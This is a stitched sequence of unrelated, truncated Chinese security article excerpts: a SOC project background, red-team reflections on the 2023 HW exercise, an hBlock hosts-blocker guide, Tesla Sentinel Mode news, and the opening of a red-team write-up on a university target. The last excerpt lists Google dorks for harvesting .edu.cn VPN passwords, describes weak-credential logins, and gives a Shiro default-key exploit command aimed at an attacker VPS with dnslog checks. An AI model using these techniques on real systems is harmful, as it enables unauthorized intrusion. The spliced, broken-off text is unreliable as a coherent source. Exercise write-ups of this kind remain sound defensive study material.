1 项目背景 1.1 整体安全观 网络安全管理平台作为企业安全的大脑，也就是整个企业的安全运营中心，其数据接入的多少、好坏直接影响到安全运营的效果，如果以汽车来比喻的话，数据就是汽车的油箱或者电瓶，是保障汽车启动的动力。 1.2 安全现状 （一）数据接入不全面，告警结果不准确 企业IT资产的日志包括系统日志、中间件日志、数据库日志，安全设备日志、网络设备日志，其涉及的日志类型多、规模庞大，企业大部分未完成全部接入，存在监控死角； （二）数据量呈现过多，重要信息难发现 以10Gbps流量的举例，大概每天会产生50000条左右的日志，但是真正有效的日志只有100条以内，想要在几万条的数据中发现几十条有用的数据，无异于是大海捞针； （三）数据存在孤岛，数据无法串联 由于企业建设的阶段不同、要求不同，安全设备存在不同的安全厂商、安全设备之间能力未打通，因此无法进行关联分析，根据洛克希德马丁的杀伤链模型，攻击并不是凭空出现，安全设备的日志与系统的日志之间都是有关联的； （四）能力建设缺失，未有统一规划 安全作为业务的附属，大多数企业在投资还是管理上都存在严重不足的情况，脑海中对安全的要求是不出事就可以，但是安全不同于业务，安全平常是不可见的，只有在被攻击的时候才会体现效果； 1.3 建设依据 ...

2023年攻防演练活动圆满收官，各位七夕节还在疯狂打HW的红蓝队师傅们辛苦了。上次分享了一些蓝队方面的想法，“攻防演练之给蓝队防守方的11个忠告”，感兴趣的师傅们可以在FreeBuf网站查看。这篇文章分享一下2023年攻防演练中红队的一些个人想法，希望和大家一起交流交流。如有不对之处，还请师傅们多多指教。 回顾2023年攻防演练行动，发生了很多非常有意思的事情，攻击队的整体表现令业界眼前一亮，给不少蓝队成员上了难忘的一课。例如在攻防演练行动刚刚开始时，就传出某某通信领域的单位被攻击队直接打穿；某某攻击队已经杀疯了等多种版本的传闻。由于事件的敏感性和保密性，导致很多消息难以百分百实锤，但也从侧面反映出2023年攻击队之强悍，战法之新颖，武器之犀利等。 最最令人感到不可思议的是，某个攻击队竟然想出一个“以溯源反制”为诱饵，引诱蓝队防守成员进入恶意环境，成功钓鱼蓝队的方法，在网络安全领域展示了一波什么才是真正的对抗，以及孙子兵法如何活灵活现应用至攻防演练行动中。 正是因为有如此出人意料的攻击方式的存在，才让攻防演练行动变得更加有意义。在攻防演练中发现问题，解决问题，真正提升企业安全防护能力，从而提升我国网络空间整体安全等级，才是攻防演练的最终目的和真正意义。 为2023年攻防演练行动中攻击队的优异表现点赞。但在攻防演练圆满收官的时候，攻击队这边也曝出舞蹈生滥竽充数的案例，其令网安行业震惊的程度不亚于上述新颖的攻击战法，甚至是有过之而无不及，可以预见，在2024年的攻防演练行动中，新人面试攻击成员将会遭遇前所未有的难度。 接下来，我会一一分享个人总结的2023年攻防演练观点，欢迎评论区留言讨论。 签了保密协议就认真履行 2023年攻防演练行动最后一天最大的瓜莫过于“苕皮哥了”。这位“苕皮哥”是某蓝队防守方成员，攻防演练的最后一天在红书发文：“暑假12天挣了3万多，奖励自己吃苕皮”，一时间引起轩然大波，迅速在整个网安圈子里流传，更是震惊了一众圈外打工人，纷纷在社交平台上惊呼“网安人搞钱太容易了。” 据说“苕皮哥”并非专业的网安人，而是一名在校舞蹈生，经过三个月的学习后以在校生的身份参加了2023年攻防演练行动，单日收入2700元。说实话这个工资已经吊打许多网安毕业生了。 不知道是觉得钱拿的过于容易，还是为了炫耀，“苕皮哥”干了一件很无脑的事情——直接公布了攻防演练进场合同，上面明确写了进场工资1800元，工作12小时以上工资上浮1.5倍，也就是2700元。 打过HW的师傅们都知道，一般这类合同都有保密协议，就这样不打码直接将进场合同发在社交平台上，对于厂商、甲方、第三方来说都是一种巨大的伤害。传闻“苕皮哥”事件传开后，厂商已经在琢磨起诉事宜，后续等待“苕皮哥”的也是会是更重的处罚。 最最糟糕的是这件事情将会给攻防演练行动的外聘人员带来严重的负面影响，很有可能以后在校大学生在面试hw时会面临更严格的要求，价格肯定也会迎来一波跳水，甚至有可能引发相关部门对于攻防演练外聘人员的整顿。“苕皮哥”行为出发点也许就是单纯的炫一波，但是最终的结果却是把网安吃饭的桌子都给掀了。 当然，从长远来看，这件事情也许会让攻防演练行动变得越来越规范，一些行业乱象将会被整改。这里强调一下，签了保密合同就要认真履行保密协议，真的别不当回事，当法院传票发来的那一刻，对于个人来说将会面临非常严重的后果。 攻击队上演“三十六计” 2023年另外一件令我大开眼界的事情，就是攻击队在攻防演练中上演了一波精彩的网安三十六计。整个攻击过程异常丝滑犹如行云流水，攻击方心思缜密层层设局，洞悉防守方的内心，一步步将防守方成员引入陷阱之中，将三十六计是玩的明明白白，实在是令人拍案叫绝，该狠狠上一波大分。 通常来说，蓝队防守方利用蜜罐来钓鱼攻击方是非常常见的手法，也是蓝队溯源反制必不可少的措施，蜜罐用的好，攻防演练的成绩基本也不会差到哪里去。但是红队以“溯源反制”为诱饵，反过来钓鱼蓝队这就不常见了。事实上这一次反钓鱼的效果非常好，蓝队成员大多中了圈套，后面结果如何已经不需要多说。 具体操作思路如下：红队故意发起攻击是蓝队进行溯源反制，在这个过程中诱导蓝队访问器搭建的恶意服务，钓鱼公告后红队再次对蓝队主机进行攻击反制，从而顺利获得防守方的内网权限。整个攻击方法不仅仅体现在技术高超，更多的是利用了规则——即没有多少蓝队能够抵得住“溯源反制”的诱惑，从而反钓鱼蓝队拿下权限。 2023年的这个案例充分说明了，网络攻防演练不是套路化的演习，而是实打实的攻守双方的激烈对抗，真正的攻击方不会和你讲任何的经验与套路，只会不断掏出新的攻击方法持续碾压你们。该案例也从侧面说明了攻防演练的实质，演习即实战，在攻防演练行动中，防守方必须时刻牢记，自己面对的是一群不论技术还是理念都十分先进的对手，千万不可放松警惕。如果我是本次攻防演练的裁判，那么我会给攻击方更多的分数，正是因为有这样持续进化的攻击方，我们的网络安全防护体系才能持续不断发展、优化。 旧的攻击方法依旧很好用 他山之石可以攻玉。在攻防演练行动开始之前，攻击队应该提前收集各类优秀的攻击方法和案例，总结学习其中的优秀思路和手法， 在攻防演练中，攻击方会利用各种技术手段和方法，如网络渗透、漏洞利用等，来尝试入侵防守方的系统或获取敏感信息。他们的目标是发现潜在的漏洞和弱点，并评估防守方对这些攻击的应对能力。红队常见的攻击方法可以分为以下八类： 互联网边界渗透。几乎所有企业都有部分开放于互联网的设备或系统，比如邮件、官网等。红队会以这些设备或系统的开放性特点，将其作为入侵的切入点。 通用产品组件漏洞利用。信息化产品虽然提高了企业的运行效率，但其自身的安全漏洞也给企业带来了很多潜在隐患。红队在攻防演练中就经常通过利用产品组件的漏洞来达成攻击目标，比如：OA漏洞、中间件漏洞、数据库漏洞等。 0day攻击。在攻防演练中，0day攻击已成为常态，由于0day漏洞能够穿透现有基于 ...

关于hBlock hBlock是一款针对用户网络安全和隐私安全的保护工具，该工具可以通过屏蔽广告、屏蔽应用程序跟踪和恶意软件域名来保护你的信息安全。 hBlock是一个符合POSIX的Shell脚本，它可以从多个来源获取提供广告、跟踪脚本和恶意软件的域名列表，并创建一个hosts文件和其他格式，以防止你的系统跟它们建立连接。 需要注意的是，hBlock在默认情况下会替换系统的hosts文件，如果有要保留的条目，请考虑先进行备份。 支持的源 数据源 主地址 镜像 adaway.org URL URL AdBlock NoCoin List URL URL AdGuard - Simplified URL URL disconnect.me - Ad URL URL disconnect.me - Malvertising URL URL disconnect.me - Malware URL URL disconnect.me - Tracking URL URL ETH PhishingDetect URL URL FadeMind - add.2o7Net URL URL FadeMind - add.Dead URL URL FadeMind - add.Risk URL URL FadeMind - add.Spam URL URL KADhosts URL URL malwaredomainlist.com URL URL malwaredomains.com - Immortal domains URL URL malwaredomains.com - Just domains URL URL matomo.org - Spammers URL URL mitchellkrogza - Badd-Boyz-Hosts URL URL pgl.yoyo.org URL URL ransomwaretracker.abuse.ch URL URL someonewhocares.org URL URL spam404.com URL URL StevenBlack URL URL winhelp2002.mvps.org URL URL ZeroDot1 - CoinBlockerLists URL URL zeustracker.abuse.ch URL URL   工具安装 hBlock支持在各种软件包管理器中安装和使用，具体请查看【最新列表】。除此之外，广大研究人员也可以通过执行下列命令将该项目最新版本的代码克隆至本地： git clone https://github.com/hectorm/hblock.git 如果你想手动执行工具安装的话，也可以执行下列命令： curl -o /tmp/hblock 'https://raw.githubusercontent.com/hectorm/hblock/v3.4.2/hblock' \   && echo 'a7d748b69db9f94932333a5b5f0c986dd60a39fdf4fe675ad58364fea59c74b4  /tmp/hblock' | shasum -c \     && sudo mv /tmp/hblock /usr/local/bin/hblock \     && sudo chown 0:0 /usr/local/bin/hblock \     && sudo chmod 755 /usr/local/bin/hblock 我们也可以直接使用NPX在不需要安装的情况下运行hBlock： npx hblock 工具使用 脚本参数 工具支持使用各种选项参数来控制工具的任务执行： Usage: hblock [options...]      -O, --output FILE            Hosts 文件路径（默认：/etc/hosts）    -R, --redirection IP           屏蔽了列表中所有条目的目的IP地址                                （默认：0.0.0.0)    -H, --header HEADER          Hosts文件头部需要引入的内容，你可以使用其他命令的输出作为该参数的数据，例如"$(cat header.txt)"    -S, --sources URLS           用于生成屏蔽列表的数据源，每个URL用空格分隔    -W, --whitelist ENTRIES       需要从屏蔽列表中移除的条目    -B, --blacklist ENTRIES        需要添加到屏蔽列表中的条目，每个域名用空格分隔    -b, --backup [DIRECTORY]     设置时间戳备份 （默认：输出文件目录）    -l, --lenient                   针对数据源进行IP地址匹配                                （默认： 0.0.0.0, 127.0.0.1 或none）    -i, --ignore-download-error   发生下载错误时继续执行任务    -c, --color auto|true|false     颜色高亮输出（默认：auto）    -q, --quiet                   禁用非错误消息    -v, --version                 显示工具版本信息和退出    -h, --help                   显示工具帮助信息和退出 保留内容 该脚本会替换掉你系统中的hosts文件，如果你想要恢复其中的部分内容，可以直接使用下列数据结构对要恢复的内容进行“封装”： # <custom>     ...   </custom> 临时禁用hBlock 有的时候你可能需要临时禁用hBlock，最简单的方式就是快速生成一个不包含任何屏蔽域名的hosts文件，命令如下： hblock -S none -D none 工具使用演示 演示视频：【点我观看】 许可证协议 本项目的开发与发布遵循MIT开源许可证协议。 项目地址 hBlock：【GitHub传送门】 参考资料 https://en.wikipedia.org/wiki/Hosts_(file) https://hblock.molinero.dev/ https://github.com/hectorm/hmirror ...

8月14日，有网友在互联网平台发消息称，湖南岳阳三荷机场的停车场立有『涉密管制区域，禁止特斯拉入内』的警示牌，不允许特斯拉汽车进入，如果特斯拉车主有停车需求，可以把人送过去后，停到机场外十字路口右拐处。随后这一消息在互联网平台引发广泛关注和讨论。 该机场公安接线人员也向媒体证实情况属实，告示已经发布了几个月，解释是“特斯拉车辆带有某种模式，车主离开后会对车身周边环境进行录像”。该工作人员还补充说明，现在很多单位都禁止特斯拉入内，机场员工的特斯拉也不能进入。 此次网友争论的焦点其实也是特斯拉一直存在的问题——不少地区限制特斯拉汽车进入。原因是哨兵模式下的特斯拉会通过前视摄像头、两侧翼子板摄像头和后视摄像头持续监控周围环境，并保存相关视频影像。 出于安全方面的考量，不少重要或涉密地区不允许特斯拉进入。事实上，国外对于特斯拉的特斯拉哨兵模式同样感到担忧。2022年，德国《每日镜报》援引德国柏林警方内部文件报道，柏林警方做出决定，禁止特斯拉汽车进入警局各单位或在警局各单位泊车，原因出在特斯拉汽车摄像头系统身上。 报道称，柏林警方在2022年初发现，特斯拉所有车型都会随时对车辆周边环境进行不间断的视频记录，并将这些记录导出。这些记录长久存储在位于荷兰的服务器上，但车主本人并不知道这些数据是如何被处理的。报道指出，由于特斯拉可以自行决定是否与第三方共享这些信息，警方认为，在这种情况下，也只有执法人员才能确保对个人数据的保护。 特斯拉回应数据泄露 针对此次热搜，特斯拉官方微博发文回应称，哨兵模式是目前主流智能汽车标配的一种智能安全配置，并非特斯拉独有。特斯拉车辆出厂时，该功能默认处于关闭状态，需要车主手动开启才能使用。 在手动启用哨兵模式后，车辆上锁并挂驻车挡时如果检测到附近可能存在损害或者盗窃车辆等威胁时，系统会向车主发出警报，并记录车辆周围的可疑活动，将视频片段保存在已安装的USB设备中为用户带来用车安全保障。目前该功能已协助警方破获了多起车辆损害和失窃案件。与一些品牌可以通过哨兵模式远程查看车辆周围环境不同，目前特斯拉车辆的这些数据只离线存储在车内USB设备中，车主和特斯拉均不能远程在线查看。 另外，特斯拉公司已在中国建立数据中心，以实现数据存储的本地化。所有在中国大陆市场销售车辆所产生的数据，都会存储在中国境内。2021年10月政府主管部门联合发布《汽车数据安全管理若T规定 (试行)》后，特斯拉公司作为首批试点企业，积极参与了主管部门组织的合规试点工作。 哨兵模式争议不断 在特斯拉的官网，目前有队哨兵模式进行解释，并指出“为保护用户的隐私，哨兵模式录像不会传输给特斯拉。对于 2018 年及之后生产的车型（软件版本为 2020.48.5 或更高版本），录像将保存到车载存储器，可以通过车辆的触摸屏直接查看。” 截止到目前，业界对于哨兵模式争议存在已久。据媒体报道，2023年2月荷兰数据保护局（dpa）发出声明称，消费者需要为使用特斯拉“哨兵模式”造成的隐私侵权负全责。 由此可见，哨兵模式的争议在于采集的数据是否安全。特斯拉之所以被禁止入内，很大原因是担忧这些环境数据会被悄悄上传至美国，大量泄露我国机密地区的信息；其次是汽车是否有权利随意采集环境数据？一旦开启哨兵模式，无论数据存储在厂商还是车主的USB中，哨兵模式将会持续收集汽车周围的信息，其中不乏个人隐私方面信息。 也许车主不会主动泄露这些信息，但在数据采集过程中并没有征集路人的同意，这是否涉及侵犯了用户的隐私呢？ ...

前言 这次攻防演练每个队伍分配不同的目标，有些队伍拿的点可以直接 nday 打，有些队伍外网打点十分困难比如我们，但分数是是统一算的，可以说不是那么的公平。不过也算是提供了些许经验，简单做一下总结，都是比较基础的东西，如有写的不正确的地方欢迎各位师傅指正。 外网打点 敏感信息泄露 一般来说学校外网能拿直接权限的点已经很少了，web 应用大多是放在 vpn 后面，因此能弄到一个 vpn 账号可以说是事半功倍 另外还可以通过语法筛选出存在默认弱口令的系统，常用命令如下： PLAINTEXT 1 2 3 4 5 6 7 #google语法 site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码 #github*.edu.cn password   查看方式优先选择最近更新，太久远的基本上失效了 这里队友收集到了某个目标的 vpn 账号，使用的是 姓名拼音/12345678 弱口令 进去内网后能访问的只有一个 OA 系统，测试了一下没发现什么东西，寻找其他突破口 shiro 无链 常规的打点可通过 fofa、hunter、quake 等网络测绘平台进行资产收集，收集好后进行去重，把去重后的资产列表进行批量指纹识别，筛选出重要易打点的系统 在常规的 hw 中这些方法比较通用，但是对于教育行业来说会相对困难，有 edusrc 的存在许多通用型漏洞已经被提交修复了，因此在信息搜集的时候要多去寻找旁站和一些容易被遗漏的站点 坐了一天牢后，终于通过测绘平台找到一个比较偏的资产，直接访问是一个静态页面，但扫描目录后指纹识别一波发现是 shiro 直接工具开冲，发现有默认 key 但是无利用链 这里想到之前学习 shiro 可以无依赖利用，感觉有戏尝试一波，相关知识可学习此文章 https://www.le1a.com/posts/a5f4a9e3/ PLAINTEXT 12 java -jar shiro_tool.jar 地址VPS:端口 通过 dnslog 测试有回显，这里有个注意点：使用 http://dnslog.cn/部分站点会拦截，可以换多个 dnslog 平台测试 dnslog 有回显接下来就是拿 shell 了，这里由于固化思维，之前遇到的都是 linux 系统，先入为主觉得是 Linux，结果没利用成功 这里可以通过网站快速生成 payload，https://x.hacking8.com/java-runtime.html 一开始以为是防火墙拦截，后面队友探测了一下目录结构，发现是 windows，所以这里 payload 要改变一下 Linux：  ...